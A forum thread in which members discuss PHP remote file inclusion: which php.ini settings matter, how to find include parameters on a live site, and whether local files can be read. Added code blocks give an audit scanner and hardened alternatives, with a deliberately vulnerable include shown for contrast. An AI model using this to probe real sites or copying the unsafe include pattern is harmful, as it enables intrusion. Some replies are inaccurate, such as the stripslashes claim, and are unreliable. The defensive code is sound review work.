
Remote File Inclusion ?Help?


Infam0us
Member
0 0

If you have seen the php.ini file for a web server and see that they have register_globals turned off BUT have

    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = On
    allow_url_include = On

under Fopen, does this mean they are almost certainly vulnerable to RFI?

What's the easiest way to find where they are using $_GET or including files that are vulnerable to remote file inclusion?

My guess is that I will have to try to inject into every parameter and just see what happens, but I would like to know if (through experience) anyone knows of a typical file inclusion vulnerability that people tend to fall back on without realizing it.

Because they have fopen and include on, does that mean they are most definitely vulnerable to RFI?

P.S. They don't have ANY filters for user input; there are tons of XSS holes in the site. I plan on giving the admin a full list of the vulnerabilities I find, but I wanna make sure I have most of the important ones.
They do have magic_quotes on though, so SQL injection is a lot harder.
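An added audit helper for the "where are they including files" question, written for this thread and not taken from the site or from any project discussed here. It scans PHP source line by line for include/require statements whose path comes from request input, either directly or through one simple assignment, and then reports the php.ini switches from the question. The PHP source it scans is a constructed sample; the function and variable names are my own.

```php
<?php
// Added audit helper, not code from the thread or from any site discussed in it.
// It scans PHP source line by line and flags include/require statements whose
// path comes from request input, either directly or through one simple
// assignment. The source below is a constructed sample, not a real site's code.

$sample = <<<'PHP'
<?php
include($_GET['page'] . '.php');                 // request input used directly
$tpl = $_REQUEST['tpl'];
require_once "themes/" . $tpl . "/header.php";   // one hop through a variable
include 'footer.php';                            // constant path, not flagged
PHP;

function findRiskyIncludes(string $source): array
{
    $findings = [];
    $sg       = '\$_(GET|POST|REQUEST|COOKIE)\b';   // request superglobals
    $tainted  = [];                                 // '$var' => line assigned

    foreach (explode("\n", $source) as $i => $line) {
        $no = $i + 1;

        // Remember simple assignments such as `$tpl = $_REQUEST['tpl'];`
        if (preg_match('/^\s*(\$\w+)\s*=[^=].*' . $sg . '/', $line, $m)) {
            $tainted[$m[1]] = $no;
        }

        // Only include/require statements are sinks for this check
        if (!preg_match('/\b(include|include_once|require|require_once)\b\s*\(?\s*(.*)$/', $line, $m)) {
            continue;
        }
        $arg    = $m[2];
        $reason = null;

        if (preg_match('/' . $sg . '/', $arg)) {
            $reason = 'request input used directly in the include path';
        } else {
            foreach ($tainted as $var => $assignedAt) {
                if (preg_match('/' . preg_quote($var, '/') . '\b/', $arg)) {
                    $reason = "$var was assigned from request input on line $assignedAt";
                    break;
                }
            }
        }

        if ($reason !== null) {
            $findings[] = ['line' => $no, 'reason' => $reason, 'code' => trim($line)];
        }
    }
    return $findings;
}

foreach (findRiskyIncludes($sample) as $f) {
    printf("line %d: %s\n    %s\n", $f['line'], $f['reason'], $f['code']);
}

// The php.ini switches from the question decide how far a flagged include can
// be steered: allow_url_include=On lets it reach a remote URL, Off limits it to
// local files. register_globals no longer exists in PHP 5.4 and later, so
// ini_get() returns false for it there.
$rg = ini_get('register_globals');
printf("allow_url_fopen=%s allow_url_include=%s register_globals=%s\n",
    ini_get('allow_url_fopen')   ? 'On' : 'Off',
    ini_get('allow_url_include') ? 'On' : 'Off',
    $rg === false ? 'removed' : ($rg ? 'On' : 'Off'));
```

On the sample it flags line 2 (the `$_GET` value goes straight into the include) and line 4 (`$tpl` was filled from `$_REQUEST` on line 3), and leaves the constant `footer.php` include alone. It is a line-based heuristic for a code review, not a full taint analysis: it misses input that travels through functions or arrays, and it will mention the word "include" inside a comment. The ini report at the end is the real answer to the original question: the two `allow_url_*` switches only matter for includes like the flagged ones, and they decide whether such an include can reach a remote file or only a local one.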


ghost
0 0

No, that doesn't mean one is almost certainly vulnerable to RFI, but it does add to the vulnerability. They would have to not sanitize their strings with stripslashes. If those 2 conditions are met, a server is vulnerable to RFI. I didn't understand the 'how do I find out how or what $_GET variable they're using' part; it sounded to me, though, like you wanted to find out what variable the attacker was trying to pass through. If that's the case, you'd need to add the variable to a database every time, which would really slow the server down and is quite unnecessary.


Infam0us
Member
0 0

slpctrl wrote: No, that doesn't mean one is almost certainly vulnerable to RFI, but it does add to the vulnerability. They would have to not sanitize their strings with stripslashes. If those 2 conditions are met, a server is vulnerable to RFI. I didn't understand the 'how do I find out how or what $_GET variable they're using' part; it sounded to me, though, like you wanted to find out what variable the attacker was trying to pass through. If that's the case, you'd need to add the variable to a database every time, which would really slow the server down and is quite unnecessary.

No, what I meant by that is when the server is using the GET method to grab a URL like "/members" and you give it an external URL to include. But now I understand that part of it. Thanks for your help :happy:


Mr_Cheese
0 1

RFIs only work if the site permits.

You can't go up to any site you want that has fopen URL on and magically do an RFI on any page.

You can only perform an RFI attack on a page that already includes a local/remote file. An RFI attack is when you change the included file path to the location of your chosen file.

So, if the website is just static HTML, RFI won't be possible on that domain.
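An added example, not code from the thread, of the include pattern Mr_Cheese is describing: a page that includes a file chosen by the request. It shows the vulnerable shape first and then two hardened forms that keep the request value away from the filesystem path, which is what actually closes the hole regardless of the php.ini switches. The page names and directory paths are assumptions made up for the example.

```php
<?php
// Added example, not code from the thread. It shows the include pattern
// Mr_Cheese describes (a page that includes a file chosen by the request) in
// its vulnerable form, then two hardened forms. File paths and page names are
// assumptions made up for the example.

// --- vulnerable shape: the request value becomes the include path ----------
// With allow_url_include=On a URL in ?page= is fetched and executed as PHP;
// with it Off the path can still be steered to any readable local file.
// Shown only for contrast, never call this.
function includeUnsafe(string $page): void
{
    include $page . '.php';
}

// --- hardened form 1: request value is only a key into a fixed table --------
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'members' => __DIR__ . '/pages/members.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage($requested): string
{
    // Anything that is not a known key (missing, array, unknown name) falls
    // back to the home page; the request value never touches the path itself.
    if (is_string($requested) && isset(PAGES[$requested])) {
        return PAGES[$requested];
    }
    return PAGES['home'];
}

// --- hardened form 2: dynamic set of pages, confined to one directory ------
function resolveUnderBase(string $base, string $name): ?string
{
    $root = realpath($base);
    // basename() drops any directory components and any URL scheme; realpath()
    // resolves symlinks and '..' so the prefix check is made on the final path.
    $candidate = realpath($base . '/' . basename($name) . '.php');
    if ($root === false || $candidate === false) {
        return null;
    }
    return strpos($candidate, $root . DIRECTORY_SEPARATOR) === 0 ? $candidate : null;
}

// Dispatch using form 1. Keep allow_url_include=Off (its default since the
// directive appeared in PHP 5.2) so a future coding mistake still cannot pull
// in remote code.
include resolvePage($_GET['page'] ?? null);
```

Form 1 is the one to prefer when the set of pages is known in advance: the request only ever selects an entry from a constant table, so there is no path to manipulate. Form 2 covers a directory of templates that changes over time; a caller should treat a `null` result as "not found" rather than falling back to the raw name. Either way the `allow_url_*` settings become defence in depth instead of the only thing standing between the request and an include of an external URL.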


DeafCode
root@Alpha.Oddities
0 0

If a server is hosted on the same space as the webmaster's box and RFI is active, and the file included is on the local machine out of the admin's personal My Docs folder, could you open up the entire My Docs folder and access all files in it?

Sorry if this sounds extremely stupid; I just don't know much about RFI. It just seemed possible from what little I do know.